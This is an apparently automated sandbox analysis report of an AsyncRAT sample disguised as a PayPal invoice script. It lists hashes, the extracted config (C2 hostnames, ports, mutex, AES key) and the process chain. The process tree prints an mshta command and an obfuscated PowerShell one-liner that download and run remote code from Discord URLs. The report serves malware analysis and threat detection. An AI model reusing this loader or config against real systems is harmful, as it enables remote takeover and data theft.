asyncrat | fda270ad50aed906730605ca93ecaa3e24792dd070bb443f94d2d6c23124ad61

General

Target

invoice-order-21412-paypal.xlxs.vbs
Size

162B
MD5

af9312989a85c937bf50226288f659ab
SHA1

ecb5925f60c91a7926579f086642c3f193fa1e64
SHA256

fda270ad50aed906730605ca93ecaa3e24792dd070bb443f94d2d6c23124ad61
SHA512

113a7dace186edcec5862f4d5fa75cab31ff096c51fac88549e42656eaba60a09660a2115579fc7aab8142b6c6bb65b0342486a522e161f598a103b2167d3413

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt

Extracted

Family

asyncrat

Version

0.5.7B

C2

:6606

:7707

:8808

usa-man.accesscam.org:6606

usa-man.accesscam.org:7707

usa-man.accesscam.org:8808

xaft.camdvr.org:6606

xaft.camdvr.org:7707

xaft.camdvr.org:8808

goodpc.theworkpc.com:6606

goodpc.theworkpc.com:7707

goodpc.theworkpc.com:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
9sb1l01wZwOFyWz3WpY3G9vMmrO3T3j5
anti_detection
false
autorun
false
bdos
false
delay
Default
host
,usa-man.accesscam.org,xaft.camdvr.org,goodpc.theworkpc.com
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6606,7707,8808
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4040-144-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4040-145-0x000000000040C79E-mapping.dmp	asyncrat
behavioral2/memory/4040-157-0x0000000006E50000-0x0000000006E6D000-memory.dmp	asyncrat
behavioral2/memory/4040-159-0x0000000006FD0000-0x0000000007010000-memory.dmp	asyncrat

Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

10 2344 mshta.exe
12 2344 mshta.exe
14 2344 mshta.exe
17 508 powershell.exe
23 508 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 508 set thread context of 4040 508 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
10	2344	mshta.exe
12	2344	mshta.exe
14	2344	mshta.exe
17	508	powershell.exe
23	508	powershell.exe

description	pid	process	target process
PID 508 set thread context of 4040	508	powershell.exe	aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exeaspnet_compiler.exe

pid	process
508	powershell.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe
4040	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeaspnet_compiler.exe

description pid process

Token: SeDebugPrivilege 508 powershell.exe
Token: SeDebugPrivilege 4040 aspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	508	powershell.exe
Token: SeDebugPrivilege	4040	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.exemshta.exepowershell.exe

description	pid	process	target process
PID 764 wrote to memory of 2344	764	WScript.exe	mshta.exe
PID 764 wrote to memory of 2344	764	WScript.exe	mshta.exe
PID 2344 wrote to memory of 508	2344	mshta.exe	powershell.exe
PID 2344 wrote to memory of 508	2344	mshta.exe	powershell.exe
PID 508 wrote to memory of 2924	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 2924	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 2924	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe
PID 508 wrote to memory of 4040	508	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-order-21412-paypal.xlxs.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/833265385779494912/833265576608530492/Encoding.txt
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
4⤵
PID:2924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/508-148-0x00000234B4480000-0x00000234B4481000-memory.dmp

Filesize
4KB

Download
memory/508-116-0x0000000000000000-mapping.dmp

Download
memory/508-122-0x00000234B4390000-0x00000234B4391000-memory.dmp

Filesize
4KB

Download
memory/508-125-0x00000234B46C0000-0x00000234B46C1000-memory.dmp

Filesize
4KB

Download
memory/508-129-0x00000234B43C3000-0x00000234B43C5000-memory.dmp

Filesize
8KB

Download
memory/508-128-0x00000234B43C0000-0x00000234B43C2000-memory.dmp

Filesize
8KB

Download
memory/508-132-0x00000234B43C6000-0x00000234B43C8000-memory.dmp

Filesize
8KB

Download
memory/508-137-0x00000234B4460000-0x00000234B447F000-memory.dmp

Filesize
124KB

Download
memory/2344-114-0x0000000000000000-mapping.dmp

Download
memory/4040-158-0x0000000006F50000-0x0000000006F51000-memory.dmp

Filesize
4KB

Download
memory/4040-160-0x00000000070B0000-0x00000000070B1000-memory.dmp

Filesize
4KB

Download
memory/4040-152-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/4040-153-0x0000000005E70000-0x0000000005E71000-memory.dmp

Filesize
4KB

Download
memory/4040-154-0x0000000006410000-0x0000000006411000-memory.dmp

Filesize
4KB

Download
memory/4040-155-0x0000000005F80000-0x0000000005F81000-memory.dmp

Filesize
4KB

Download
memory/4040-156-0x0000000006ED0000-0x0000000006ED1000-memory.dmp

Filesize
4KB

Download
memory/4040-157-0x0000000006E50000-0x0000000006E6D000-memory.dmp

Filesize
116KB

Download
memory/4040-145-0x000000000040C79E-mapping.dmp

Download
memory/4040-159-0x0000000006FD0000-0x0000000007010000-memory.dmp

Filesize
256KB

Download
memory/4040-144-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads